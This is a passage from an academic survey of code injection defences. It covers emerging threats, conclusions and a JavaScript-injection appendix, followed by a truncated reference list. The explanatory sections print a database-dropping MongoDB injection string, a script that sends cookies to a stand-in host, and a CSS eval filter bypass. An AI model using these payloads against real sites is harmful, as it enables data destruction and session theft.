every case this indicates the cost due to the use of each mechanism. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 21/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 For example, it may be due to some form of run-time checks. Furthermore, depending on the approach, the cost may be incurred on different places: it may affect a server (e.g., CPU usage, response latency and more), it may affect the client, or both. A note on usability The value of a security mechanism as a practical tool depends on how easy it is to deploy it in a production setting. In the static analysis context, a mechanism should require minimum effort from the security auditor. Observe that lexical analysis and data-flow analysis mechanisms are easy to use since the only thing that is needed to perform their analysis is the source code. Note though that, based on simple assumptions and without considering context in any way lexical analysis could report every possible dangerous function call as a problem, no matter how carefully it is used in the program. Hence, auditors must be experienced programmers in order to interpret the results of lexical analysis tools and they must regard them as as an aid in the code review process and not as a firm solution to find software vulnerabilities (Cowan, 2003; Zitser, Group & Leek, 2004). In addition, model checking and type system extensions require too much effort from the side of the auditor, either to write specifications, modify source code or learn new constructs (see ‘Model checking’ and ‘Type system extensions’). In the case of dynamic detection, usability involves the deployment of the mechanism. To determine the effort required to use the mechanism, we examined the mechanism’s description, its deployment, and its implementation details. One of our basic criteria was if developers are required to modify their code and if they do, to what extent. As an example, consider the mechanisms coming from the policy enforcement category. In most cases programmers should modify multiple software components to enable a mechanism. Note also that mechanisms such as MET and BEEP require modifications both on the server and the client-side. Thus, it would not be easy for them to be adopted by browser vendors. In the same manner SQLrand imposes a major infrastructure overhead because it requires the integration of a proxy for the RDBMS to detect SQL injection attacks. In addition, the whitelisting mechanisms that detect DSL-driven injection attacks, require multiple source code modifications. In particular, to use AMNESIA, developers should modify every code fragment that involves the execution of a query. Nevertheless, there are tools like Sdriver, which minimize such modifications down to one line of code. EMERGING CHALLENGES There are several challenges which indicate that code injection attacks will continue to be an issue in the field of cyber security. First, attackers seem to find new ways to introduce malicious code into programs by using a variety of techniques. For instance, an attack called PHP Object Injection (POI) (Dahse, Krein & Holz, 2014) does not directly involve the injection of code, but still achieves arbitrary code execution in the context of a PHP application through the injection of specially crafted objects (for example as part of cookies). When deserialized by the application, these objects result in arbitrary code execution. In a similar way, XCS (Cross-channel scripting) (Bojinov, Bursztein & Boneh, 2009; Bojinov, Bursztein & Boneh, Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 22/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 2010) attacks are a prominent XSS variation. In an XCS attack, an attacker utilizes a non-web channel to inject code. For example, there are several NAS (Network-Attached Storage) devices which allow unauthorized users to upload files via the SMB protocol (Server Message Block). A malicious user could upload a file with a filename that contains a well-crafted script. When a legitimate user connects over a web channel to the device to browse its contents, the device will send through an HTTP response the list of all filenames, ncluding the malicious one which is going to be interpreted as a valid script by the browser. Architectures that include modern technologies such as MongoDB (http://www. mongodb.org/) could be vulnerable to complex attacks that may involve more than one subcategories as Son, McKinley & Shmatikov (2013) have pointed out. In particular, a JavaScript injection attack could be performed to change an SQL-like MongoDB query that is built dynamically based on user input. Specifically, when using JavaScript, developers have to make sure that any variables that cross the PHP-to-JavaScript boundary are passed in the scope field of the MongoCode class, (http://www.php.net/manual/en/class.mongocode.php) that is not interpolated into the JavaScript string. This can come up when using the MongoDB::execute() method and clauses like $where and group-by. For example, suppose that JavaScript is used to greet a user in the database logs: <?php $username = $_POST[ ’ username ’ ] ; $db−>e x ec u te ( " p r i n t ( ’ Hello , $username ! ’ ) ; " ) ; ?> If attackers pass ’); db.users.drop(); print(’ as a username, they could actually delete the entire database. Recent work indicates that code injection can also be used as an attack vector to exploit mobile applications (Bao et al., 2017; Jin et al., 2014). This is not surprising because even though there are slightly different components that interact in the context of mobile applications, programming vulnerabilities thay may lead to code injection can still show up. Specifically, as Jin et al. (2014) point out, vulnerable HTML5-based mobile applications can be vulnerable to XSS variations. Such attacks could involve different channels to send malicous scripts to the user’s browser including 2D barcodes and Wi-Fi access points. CONCLUSIONS Code injection attacks can be divided into two classes: those that target binary executable code and those that target the source code of domain specific and dynamic languages. Approaches that defend against source code injection attacks can be grouped into two major categories: static analysis mechanisms that detect code injection vulnerabilities, and dynamic detection approaches that prevent code injection attacks the moment they take place. Tools coming from the static analysis category are mainly used during application development, while dynamic detection mechanisms are employed during production. We examined the defenses based on their flexibility, implementation independence, computational overhead, and effectiveness tests. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 23/40 https://peerj.com http://www.mongodb.org/ http://www.mongodb.org/ http://www.php.net/manual/en/class.mongocode.php http://dx.doi.org/10.7717/peerj-cs.136 We observed that researchers do not extensively test their mechanisms in terms of effectiveness. A reasonable explanation for this would be that some defenses do not need to be fully validated through testing, because researchers provide formal arguments as to why they are secure. However, this is true only if implementations closely follow the specification, which may not be the case in practical terms. Notably, there are cases where the effectiveness of some mechanisms has been questioned (Sovarel, Evans & Paul, 2005; Zitser, Lippmann & Leek, 2004; Wilander & Kamkar, 2002). Moreover, we saw that computational overheads are mostly computed and reported under different assumptions and settings, hence they cannot be used to compare mechanisms directly. Overheads also depend on context: in interactive applications latency is important, whereas in a batch setting the important measure is throughput or the corresponding slowdown. By taking account the above it would be fair to compare the SICILIAN to nSign in terms of computational overhead, because they both wrap up the JavaScript engine of a browser to defend against XSS attacks. Nevertheless, it would be spurious to compare both of them to a mechanism that acts as a proxy on the server side to defend against the same threat (e.g., BrowserShield). We also found that most approaches are flexible, meaning that they can be used to counter different forms of code injection. For example, ISR and whitelisting have been applied to counter all kinds of code injection attacks. This is not the case though with lexical analysis, which is used only to detect binary code injection vulnerabilities. Approaches can be interdependent and they can borrow heavily from others. Consider for instance runtime tainting and data-flow analysis. Both examine the flow of data but in different ways: the former does so dynamically and the latter statically. For this reason though, methods can also share the same disadvantages. For example, the state explosion issue appears in both model checking and symbolic execution. Currently, most defenses target a small number of attacks, but this will probably change in the future. Specifically, a large amount of work has been done to prevent either SQL and JavaScript-driven injection attacks. This makes sense, because these attacks are very common and can have a large impact. Less effort has been put to develop approaches that can defend against XPath or XML injection attacks. As a result, there are few corresponding defenses. Similarly, there is only one documented mechanism designed to detect PHP injection attacks, PHP Aspis, and only one that prevents NoSQL injection attacks, Diglossia. Attacks and defenses are likely to evolve in the coming years. The driver will be new threats, such as the PHP Object Injection (POI) (Dahse, Krein & Holz, 2014) attack, and Cross-Channel Scripting (XCS), both discussed in ‘Emerging Challenges’ Apart from the above, attackers seem to continuously find new ways to introduce malicious code to applications by using a variety of languages and techniques as we observed earlier (see ‘Code Injection Attacks’ and ‘Emerging Challenges’. Besides, there are several recent attempts to perform code injection on mobile applications (Bao et al., 2017; Jin et al., 2014) which will potentially lead to the development of context-aware defenses. We hope that our categorization, our analysis, and the findings of our research, will aid researchers and Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 24/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 practitioners to further study the code injection problem and develop more robust and effective defenses. ACKNOWLEDGEMENTS We want to thank the reviewers for providing us with valuable suggestions and insightful comments. APPENDIX. JAVASCRIPT INJECTION ATTACKS A JavaScript injection vulnerability is manifested when a web application accepts and redisplays data of uncertain origin without appropriate validation and filtering. Such content can compromise the security of these applications and the privacy of their corresponding users. Many web sites allow registered users to post data which are stored on the server-side (i.e., a third-party comment on a blog page). If attackers hide a script in such data, they could manipulate the browser of another user. For example consider the following code snippet: < s c r i p t type=" t e x t / j a v a s c r i p t "> document . l o c a t i o n = ’ http : / / host . example / cgi− bin / c o o k i e s t e a l i n g . c g i ? ’+ document . cookie </ s c r i p t > If a malicious user could post data containing the above script, web users visiting the page that contains this data could have their cookies stolen. Through this script the attacker calls an external Common Gateway Interface (CGI) script and passes all the cookies associated with the current document to it as an argument via the document.cookie property. A common but rough way to stop malicious behaviors like this is server-side code filtering (i.e., the server strips out the word ‘‘javascript’’ from any external source) (Jim, Swamy & Hicks, 2007). Still, there are many ways to bypass such defense mechanisms. For example, one could escape special characters to bypass simple filtering operations, or take advantage of issues in the implementation of Cascading Style Sheets (Css) rendering engines of browsers like Microsoft Internet Explorer (versions prior to 7). Consider the case where an attacker manages to hide the following listing in the Css of a web page: <div id=code s t y l e =" background : u r l ( ’ j a v a s c r i p t : e v a l ( document . a l l . code . foo ) ’ ) " foo=" a l e r t ( ’ xss ’ ) "></ div> The attacker utilizes the eval function and a newline character (‘‘java–newline–script’’) to bypass the security checks and manoeuvre browser to execute the code contained in the foo variable. This is done by using the document.all array that contains all of the elements within a document. Attacks like the above take advantage of the fact that eval executes the code passed to it in the same environment as the function’s caller. Malicious users can also use eval to Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 25/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 assemble innocuous-looking parts into harmful strings that the protecting mechanisms of a web page would normally consider dangerous and remove (Richards et al., 2011). Furthermore, a JavaScript injection attack does not necessarily have to involve HTML elements. A malicious user can embed a script within a PostScript file, upload it as a valid document and then use it to trigger the attack (Barth, Caballero & Song, 2009). ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was funded under Action 2 of the Athens University of Economics and Business Research Center Program for Excellence and Extroversion of the academic year 2016/2017 (EP-2606-01: The ‘‘Meta-Life’’ of JavaScript). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Athens University of Economics and Business Research Center Program: EP-2606-01. Competing Interests The authors declare there are no competing interests. Author Contributions • Dimitris Mitropoulos analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Diomidis Spinellis wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: The research in this article did not generate, collect or analyse any raw data or code. REFERENCES Abadi M, Budiu M, Erlingsson U, Ligatti J. 2005. Control-flow Integrity. In: Jaeger T, ed. Proceedings of the 12th ACM conference on computer and communications security, CCS’05. New York: ACM, 340–353. Abelson H, Sussman GJ. 1996. Structure and interpretation of computer programs. Second Edition. Cambridge: MIT Press. Abi-Antoun M, Wang D, Torr P. 2007. Checking threat modeling data flow diagrams for implementation conformance and security. In: Stirewalt K, ed. Proceedings of the 22nd IEEE/ACM international conference on automated software engineering, ASE’07. New York: ACM, 393–396. Aho AV, Lam MS, Sethi R, Ullman JD. 2006. Compilers: principles, techniques, and tools. Second Edition. Harlow, Essex: Addison-Wesley Longman Publishing Co., Inc. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 26/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Anderson A. 2005. A comparison of two privacy policy languages: EPAL and XACML. Technical report. Sun Microsystems, Inc., Mountain View, CA, USA. Anderson P, Zarins M. 2005. The codesurfer software understanding platform. In: Cordy JR, Gall H, Maletic JI, eds. Proceedings of the 13th international workshop on program comprehension, IWPC’05. Washington, D.C.: IEEE Computer Society, 147–148. Anderson RJ. 2001. Security engineering: a guide to building dependable distributed systems. First Edition. New York: John Wiley & Sons, Inc. Antunes N, Laranjeiro N, Vieira M, Madeira H. 2009. Effective detection of SQL/XPath injection vulnerabilities in web services. In: Sarkar S, Vin HM, Zhao JL, eds. Proceedings of the 2009 IEEE international conference on services computing, SCC’09. Washington, D.C.: IEEE Computer Society, 260–267. Athanasopoulos E, Pappas V, Krithinakis A, Ligouras S, Markatos EP, Karagiannis T. 2010. xJs: practical XSS prevention for web application development. In: Ousterhout J, ed. Proceedings of the 2010 USENIX conference on Web application development, WebApps’10. Berkeley: USENIX Association, 13–13. Avancini A, Ceccato M. 2013. Comparison and integration of genetic algorithms and dynamic symbolic execution for security testing of cross-site scripting vulnerabilities. Information and Software Technology 55(12):2209–2222 DOI 10.1016/j.infsof.2013.08.001. Avgerinos T, Rebert A, Cha SK, Brumley D. 2014. Enhancing symbolic execution with veritesting. In: Jalote P, ed. Proceedings of the 36th international conference on software engineering, ICSE 2014. New York: ACM, 1083–1094. Ayewah N, Pugh W. 2010. The Google FindBugs fixit. In: Tonella P, ed. Proceedings of the 19th international symposium on Software testing and analysis, ISSTA’10. New York: ACM, 241–252. Baca D, Carlsson B, Lundberg L. 2008. Evaluating the cost reduction of static code analysis for software security. In: Erlingsson Ú, Pistoia M, eds. Proceedings of the third ACM SIGPLAN workshop on Programming languages and analysis for security, PLAS’08. New York: ACM, 79–88. Bao W, Yao W, Zong M, Wang D. 2017. Cross-site Scripting attacks on android hybrid applications. In: Proceedings of the 2017 international conference on cryptography, security and privacy, ICCSP’17. New York: ACM, 56–61. Barth A, Caballero J, Song D. 2009. Secure content sniffing for web browsers, or how to stop papers from reviewing themselves. In: Sterritt R, ed. Proceedings of the 30th IEEE symposium on security and privacy. Washington, D.C.: IEEE Computer Society, 360–371. Bauer L, Cai S, Jia L, Timothy P, Michael S, Yuan T. 2015. Run-time monitoring and formal analysis of information flows in Chromium. In: Tsudik G, Perrig A, eds. Network and distributed system security (NDSS)’15, 8–11 February 2015, San Diego, CA, USA. Reston: Internet Society. Beyer D, Henzinger TA, Jhala R, Majumdar R. 2007. The software model checker blast: applications to software engineering. International Journal on Software Tools for Technology Transfer 9(5):505–525 DOI 10.1007/s10009-007-0044-z. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 27/40 https://peerj.com http://dx.doi.org/10.1016/j.infsof.2013.08.001 http://dx.doi.org/10.1007/s10009-007-0044-z http://dx.doi.org/10.7717/peerj-cs.136 Bisht P, Venkatakrishnan VN. 2008. XSS-GUARD: precise dynamic prevention of cross-site scripting attacks. In: Zamboni D, ed. Proceedings of the 5th international conference on detection of intrusions and malware, and vulnerability assessment, DIMVA’08. Berlin: Springer-Verlag, 23–43. Bojinov H, Bursztein E, Boneh D. 2009. XCS: cross channel scripting and its impact on web applications. In: Al-Shaer E, ed. Proceedings of the 16th ACM conference on computer and communications security. New York: ACM, 420–431. Bojinov H, Bursztein E, Boneh D. 2010. The emergence of cross channel scripting. Communications of the ACM 53(8):105–113 DOI 10.1145/1787234.1787257. Boujarwah AS, Saleh K, Al-Dallal J. 2000. Testing Java programs using dynamic data flow analysis. In: Carroll J, Daminani E, Haddad H, Oppenheim D, eds. Proceedings of the 2000 ACM symposium on applied computing—volume 2, SAC’00. New York: ACM, 725–727. Boyd S, Keromytis A. 2004. SQLrand: preventing SQL injection attacks. In: Jakobsson M, Yung M, Zhou J, eds. Proceedings of the 2nd applied cryptography and network security conference, ACNS’04. Springer-Verlag, 292–304. Bratus S, Locasto ME, Patterson LSML, Shubina A. 2011. Exploit programming: from buffer overflows to ‘‘Weird Machines’’ and theory of computation. j-LOGIN 36(6):13–21. Brown M, Paller A. 2008. Secure software development: why the development world awoke to the challenge. Information Security Technical Report 13(1):40–43 DOI 10.1016/j.istr.2008.03.001. Buchanan E, Roemer R, Shacham H, Savage S. 2008. When good instructions go bad: generalizing return-oriented programming to RISC. In: Ning P, ed. Proceedings of the 15th ACM conference on computer and communications security, CCS’08. New York: ACM, 27–38. Buehrer G, Weide BW, Sivilotti PAG. 2005. Using parse tree validation to prevent SQL injection attacks. In: Di Nitto E, Murphy AL, eds. Proceedings of the 5th international workshop on software engineering and middleware, SEM’05. New York: ACM, 106–113. Cadar C, Dunbar D, Engler D. 2008. KLEE: unassisted and automatic generation of high-coverage tests for complex systems programs. In: Draves R, Van Renesse R, eds. Proceedings of the 8th USENIX conference on operating systems design and implementation, OSDI’08. Berkeley: USENIX Association, 209–224. Cadar C, Godefroid P, Khurshid S, Păsăreanu CS, Sen K, Tillmann N, Visser W. 2011. Symbolic execution for software testing in practice: preliminary assessment. In: Taylor RN, ed. Proceedings of the 33rd international conference on software engineering, ICSE’11. New York: ACM, 1066–1071. Cahoon B, McKinley KS. 2001. Data flow analysis for software prefetching linked data structures in java. In: Valero M, ed. Proceedings of the 2001 international conference on parallel architectures and compilation techniques, PACT’01. Washington, D.C.: IEEE Computer Society, 280–291. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 28/40 https://peerj.com http://dx.doi.org/10.1145/1787234.1787257 http://dx.doi.org/10.1016/j.istr.2008.03.001 http://dx.doi.org/10.7717/peerj-cs.136 Cannings R, Dwivedi H, Lackey Z. 2007. Hacking exposed web 2.0: web 2.0 security secrets and solutions. New York: McGraw-Hill Osborne Media. CERT. 2002. CERT vulnerability note VU282403 Online. Available at http://www.kb.cert. org/vuls/id/282403 (accessed on 7 January 2007). Chaudhuri A, Foster JS. 2010. Symbolic security analysis of ruby-on-rails web applications. In: Al-Shaer E, ed. Proceedings of the 17th ACM conference on computer and communications security, CCS’10. New York: ACM, 585–594 DOI 10.1145/1866307.1866373. Chen H, Wagner D. 2002. MOPS: an infrastructure for examining security prop- erties of software. In: Atluri V, ed. Proceedings of the 9th ACM conference on computer and communications security, CCS’02. New York: ACM, 235–244 DOI 10.1145/586110.586142. Chen K, Wagner D. 2007. Large-scale analysis of format string vulnerabilities in debian linux. In: Hicks M, ed. Proceedings of the 2007 workshop on program- ming languages and analysis for security, PLAS’07. New York: ACM, 75–84 DOI 10.1145/1255329.1255344. Chess B, McGraw G. 2004. Static analysis for security. IEEE Security and Privacy 2(6):76–79 DOI 10.1109/MSP.2004.111. Chess B, West J. 2007. Secure programming with static analysis. Upper Saddle River: Addison-Wesley Professional. Chlipala A. 2010. Static checking of dynamically-varying security policies in database- backed applications. In: Arpaci-Dusseau R, Chen B, eds. Proceedings of the 9th USENIX conference on operating systems design and implementation, OSDI’10. Berkeley: USENIX Association, 1. Chodorow K, Dirolf M. 2010. MongoDB: the definitive guide. Sebastopol: O’Reilly Media. Clarke EM, Emerson EA, Sifakis J. 2009. Model checking: algorithmic verification and debugging. Communications of the ACM 52(11):74–84 DOI 10.1145/1592761.1592781. Cook WR, Rai S. 2005. Safe query objects: statically typed objects as remotely executable queries. In: Roman G-C, ed. Proceedings of the 27th international conference on soft- ware engineering, ICSE’05. New York: ACM, 97–106 DOI 10.1109/ICSE.2005.1553552. Corin R, Manzano FA. 2012. Taint analysis of security code in the KLEE symbolic execution engine. In: Chim TW, Yuen TH, eds. Proceedings of the 14th international conference on information and communications security, ICICS’12. Berlin: Springer- Verlag, 264–275 DOI 10.1007/978-3-642-34129-8_23. Cowan C. 2003. Software security for open-source systems. IEEE Security and Privacy 1(1):38–45 DOI 10.1109/MSECP.2003.1176994. Cowan C, Pu C, Maier D, Hintony H, Walpole J, Bakke P, Beattie S, Grier A, Wagle P, Zhang Q. 1998. StackGuard: automatic adaptive detection and prevention of buffer- overflow attacks. In: Proceedings of the 7th USENIX security symposium. Berkeley: USENIX Association, 5–5. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 29/40 https://peerj.com http://www.kb.cert.org/vuls/id/282403 http://www.kb.cert.org/vuls/id/282403 http://dx.doi.org/10.1145/1866307.1866373 http://dx.doi.org/10.1145/586110.586142 http://dx.doi.org/10.1145/1255329.1255344 http://dx.doi.org/10.1109/MSP.2004.111 http://dx.doi.org/10.1145/1592761.1592781 http://dx.doi.org/10.1109/ICSE.2005.1553552 http://dx.doi.org/10.1007/978-3-642-34129-8_23 http://dx.doi.org/10.1109/MSECP.2003.1176994 http://dx.doi.org/10.7717/peerj-cs.136 Dahse J, Holz T. 2014. Static detection of second-order vulnerabilities in web applica- tions. In: Fu K, ed. Proceedings of the 23rd USENIX security symposium. Berkeley: USENIX Association, 989–1003. Dahse J, Krein N, Holz T. 2014. Code reuse attacks in PHP: automated POP chain generation. In: Ahn G-J, ed. Proceedings of the 21st ACM conference on computer and communications security. 42–53 DOI 10.1145/2660267.2660363. Das SK, Kant K, Zhang N. 2012. Handbook on securing cyber-physical critical infrastruc- ture. First Edition. San Francisco: Morgan Kaufmann Publishers Inc. De Groef W, Devriese D, Nikiforakis N, Piessens F. 2012. FlowFox: a web browser with flexible and precise information flow control. In: Yu T, ed. Proceedings of the 2012 ACM conference on computer and communications security, CCS’12. New York: ACM, 748–759 DOI 10.1145/2382196.2382275. Denning DE, Denning PJ. 1977. Certification of programs for secure information flow. Communications of the ACM 20(7):504–513 DOI 10.1145/359636.359712. Denning DER. 1987. An intrusion detection model. IEEE Transactions on Software Engineering 13(2):222–232 DOI 10.1109/TSE.1987.232894. Dhawan M, Ganapathy V. 2009. Analyzing information flow in JavaScript-based browser extensions. In: Proceedings of the 2009 annual computer security applications conference, ACSAC’09. Washington, D.C.: IEEE Computer Society, 382–391 DOI 10.1109/ACSAC.2009.43. Doupé A, Cui W, Jakubowski MH, Peinado M, Kruegel C, Vigna G. 2013. deDacota: toward preventing server-side XSS via automatic code and data separation. In: Proceedings of the 2013 ACM conference on computer and communications security, CCS’13. New York: ACM, 1205–1216. Dybvig RK. 2009. The Scheme programming language. Fourth Edition. Cambridge: MIT Press. Egele M, Wurzinger P, Kruegel C, Kirda E. 2009. Defending Browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel U, Bruschi D, eds. Proceedings of the 6th international conference on detection of intrusions and malware, and vulnerability assessment, DIMVA’09. Berlin: Springer-Verlag, 88–106 DOI 10.1007/978-3-642-02918-9_6. Eisenberg A, Melton J. 1999. SQLJ Part 1: SQL routines using the Java programming lan- guage. Newsletter, ACM SIGMOD Record 28(4):58–63 DOI 10.1145/344816.344864. Erdweg S. 2013. Extensible languages for flexible and principled domain abstraction. PhD thesis, Philipps-Universitat Marburg. Erdweg S, Kats LCL, Rendel T, Kästner C, Ostermann K, Visser E. 2011. Library- based model-driven software development with SugarJ. In: Proceedings of the ACM international conference companion on object oriented programming systems languages and applications companion, SPLASH’11. New York: ACM, 17–18 DOI 10.1145/2048147.2048156. Erlingsson Ú, Livshits B, Xie Y. 2007. End-to-end web application security. In: Hunt G, ed. Proceedings of the 11th USENIX workshop on hot topics in operating systems. Berkeley: USENIX Association, 18:1–18:6. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 30/40 https://peerj.com http://dx.doi.org/10.1145/2660267.2660363 http://dx.doi.org/10.1145/2382196.2382275 http://dx.doi.org/10.1145/359636.359712 http://dx.doi.org/10.1109/TSE.1987.232894 http://dx.doi.org/10.1109/ACSAC.2009.43 http://dx.doi.org/10.1007/978-3-642-02918-9_6 http://dx.doi.org/10.1145/344816.344864 http://dx.doi.org/10.1145/2048147.2048156 http://dx.doi.org/10.7717/peerj-cs.136 Evans D, Larochelle D. 2002. Improving security using extensible lightweight static analysis. IEEE Software 19(1):42–51 DOI 10.1109/52.976940. Fagan ME. 1999. Design and code inspections to reduce errors in program development. IBM Systems Journal 38(2–3):258–287 DOI 10.1147/sj.382.0258. Fazzini M, Saxena P, Orso A. 2015. AutoCSP: automatically retrofitting CSP to web applications. In: Bertolino A, ed. Proceedings of the 37th international conference on software engineering, ICSE’15. New York: ACM. Fehnker A, Huuck R, Rödiger W. 2011. Model checking dataflow for malicious input. In: Proceedings of the workshop on embedded systems security, WESS’11. New York: ACM, 4:1–4:10. Fisher M, Ellis J, Bruce J. 2003. JDBC API tutorial and reference. Third Edition. Boston: Addison Wesley. Fosdick LD, Osterweil LJ. 1976. Data flow analysis in software reliability. ACM Comput- ing Surveys 8(3):305–330 DOI 10.1145/356674.356676. Francillon A, Castelluccia C. 2008. Code injection attacks on harvard-architecture devices. In: Ning P, ed. Proceedings of the 15th ACM conference on computer and com- munications security, CCS’08. New York: ACM, 15–26 DOI 10.1145/1455770.1455775. Fu X, Qian K. 2008. SAFELI: SQL injection scanner using symbolic execution. In: Pro- ceedings of the 2008 workshop on testing, analysis, and verification of web services and applications, TAV-WEB’08. New York: ACM, 34–39 DOI 10.1145/1390832.1390838. Göktas E, Athanasopoulos E, Bos H, Portokalidis G. 2014. Out of control: overcoming control-flow integrity. In: Proceedings of the 2014 IEEE symposium on security and pri- vacy. Washington, D.C.: IEEE Computer Society, 575–589 DOI 10.1109/SP.2014.43. Gregoire J, Buyens K, Win BD, Scandariato R, Joosen W. 2007. On the secure software development process: CLASP and SDL Compared. In: Proceedings of the third inter- national workshop on software engineering for secure systems, SESS’07. Washington, D.C.: IEEE Computer Society, 1 DOI 10.1016/j.infsof.2008.01.010. Gundy MV, Chen H. 2009. Noncespaces: using randomization to enforce information flow tracking and thwart cross-site scripting attacks. In: Proceedings of the 16th annual network and distributed system security symposium (NDSS). San Diego. Haldar V, Chandra D, Franz M. 2005. Dynamic taint propagation for Java. In: Pro- ceedings of the 21st annual computer security applications conference, ACSAC’05. Washington, D.C.: IEEE Computer Society, 303–311 DOI 10.1109/CSAC.2005.21. Halfond WG, Viegas J, Orso A. 2006. A classification of SQL-injection attacks and countermeasures. In: Proceedings of the international symposium on secure software engineering. Halfond W. GJ, Orso A. 2005a. AMNESIA: analysis and monitoring for neutralizing SQL-injection attacks. In: Proceedings of the 20th IEEE/ACM international conference on automated software engineering, ASE’05. New York: ACM, 174–183. Halfond WGJ, Orso A. 2005b. Combining static analysis and runtime moni- toring to counter SQL-injection attacks. In: Proceedings of the third interna- tional workshop on dynamic analysis, WODA’05. New York: ACM Press, 1–7 DOI 10.1145/1083246.1083250. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 31/40 https://peerj.com http://dx.doi.org/10.1109/52.976940 http://dx.doi.org/10.1147/sj.382.0258 http://dx.doi.org/10.1145/356674.356676 http://dx.doi.org/10.1145/1455770.1455775 http://dx.doi.org/10.1145/1390832.1390838 http://dx.doi.org/10.1109/SP.2014.43 http://dx.doi.org/10.1016/j.infsof.2008.01.010 http://dx.doi.org/10.1109/CSAC.2005.21 http://dx.doi.org/10.1145/1083246.1083250 http://dx.doi.org/10.7717/peerj-cs.136 Halfond W. GJ, Orso A. 2006. Preventing SQL injection attacks using AMNESIA. In: Osterweil LJ, ed. Proceedings of the 28th international conference on software engineering, ICSE’06. New York: ACM, 795–798 DOI 10.1145/1134285.1134416. Hedin D, Birgisson A, Bello L, Sabelfeld A. 2014. JSFlow: tracking information flow in JavaScript and Its APIs. In: Cho Y, Shin SY, eds. Proceedings of the 29th annual ACM symposium on applied computing, SAC’14. New York: ACM, 1663–1671 DOI 10.1145/2554850.2554909. Heffley J, Meunier P. 2004. Can source code auditing software identify common vulnerabilities and be used to evaluate software security? In: Proceedings of the 37th annual Hawaii international conference on system sciences, HICSS’04. Washington, D.C.: IEEE Computer Society DOI 10.1109/HICSS.2004.1265654. Hicks B, Rueda S, Clair st.L, Jaeger T, McDaniel P. 2010. A logical specification and analysis for SELinux MLS Policy. ACM Transactions on Information and System Security 13(3):26:1–26:31 DOI 10.1145/1805874.1805982. Holzmann GJ. 1997. The model checker SPIN. IEEE Transactions of Software Engineering 23(5):279–295 DOI 10.1109/32.588521. Hovemeyer D, Pugh W. 2007. Finding more null pointer bugs, but not too many. In: Proceedings of the 7th ACM workshop on program analysis for software tools and engineering, PASTE’07. New York: ACM, 9–14 DOI 10.1145/1251535.1251537. Howard M, LeBlanc D. 2003. Writing secure code. Second Edition. Redmond: Microsoft Press. Jim T, Swamy N, Hicks M. 2007. Defeating script injection attacks with browser-enforced embedded policies. In: Williamson C, Zurko ME, eds. Proceedings of the 16th international conference on World Wide Web, WWW’07. New York: ACM, 601–610 DOI 10.1145/1242572.1242654. Jin X, Hu X, Ying K, Du W, Yin H, Peri GN. 2014. Code injection attacks on HTML5- based mobile apps: characterization, detection and mitigation. In: Ahn G-J, ed. Proceedings of the 2014 ACM conference on computer and communications security, CCS’14. New York: ACM, 66–77 DOI 10.1145/2660267.2660275. Johns M, Beyerlein C. 2007. SMask: preventing injection attacks in web applications by approximating automatic data/code separation. In: Cho Y, Wainwright RL, Haddad HM, eds. Proceedings of the 2007 ACM symposium on applied computing, SAC’07. New York: ACM, 284–291 DOI 10.1145/1244002.1244071. Johns M, Engelmann B, Posegga J. 2008. XSSDS: server-side detection of cross-site scripting attacks. In: Proceedings of the 2008 annual computer security applications conference, ACSAC’08. Washington, D.C.: IEEE Computer Society, 335–344 DOI 10.1109/ACSAC.2008.36. Johnson RT. 2006. Verifying security properties using type-qualifier inference. PhD thesis, Berkeley, CA, USA. AAI3253911. Jovanovic N, Kruegel C, Kirda E. 2006. Pixy: a static analysis tool for detecting web application vulnerabilities (Short Paper). In: Proceedings of the 2006 IEEE symposium on security and privacy. Washington, D.C.: IEEE Computer Society, 258–263 DOI 10.1109/SP.2006.29. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 32/40 https://peerj.com http://dx.doi.org/10.1145/1134285.1134416 http://dx.doi.org/10.1145/2554850.2554909 http://dx.doi.org/10.1109/HICSS.2004.1265654 http://dx.doi.org/10.1145/1805874.1805982 http://dx.doi.org/10.1109/32.588521 http://dx.doi.org/10.1145/1251535.1251537 http://dx.doi.org/10.1145/1242572.1242654 http://dx.doi.org/10.1145/2660267.2660275 http://dx.doi.org/10.1145/1244002.1244071 http://dx.doi.org/10.1109/ACSAC.2008.36 http://dx.doi.org/10.1109/SP.2006.29 http://dx.doi.org/10.7717/peerj-cs.136 Kantorovitz IP. 2004. Lexical analysis tool. ACM SIGPLAN Notices 39(5):66–74 DOI 10.1145/997140.997147. Kc GS, Keromytis AD, Prevelakis V. 2003. Countering code-injection attacks with instruction-set randomization. In: Jajodia S, ed. CCS’03: proceedings of the 10th ACM conference on computer and communications security. New York: ACM, 272–280 DOI 10.1145/948109.948146. Keromytis AD. 2009. Randomized instruction sets and runtime environments past research and future directions. IEEE Security and Privacy 7(1):18–25 DOI 10.1109/MSP.2009.15. Keromytis AD. 2011. Buffer overflow attacks. In: Encyclopedia of cryptography and security. Second Edition. 174–177. King JC. 1976. Symbolic execution and program testing. Communications of the ACM 19(7):385–394 DOI 10.1145/360248.360252. Kiriansky V, Bruening 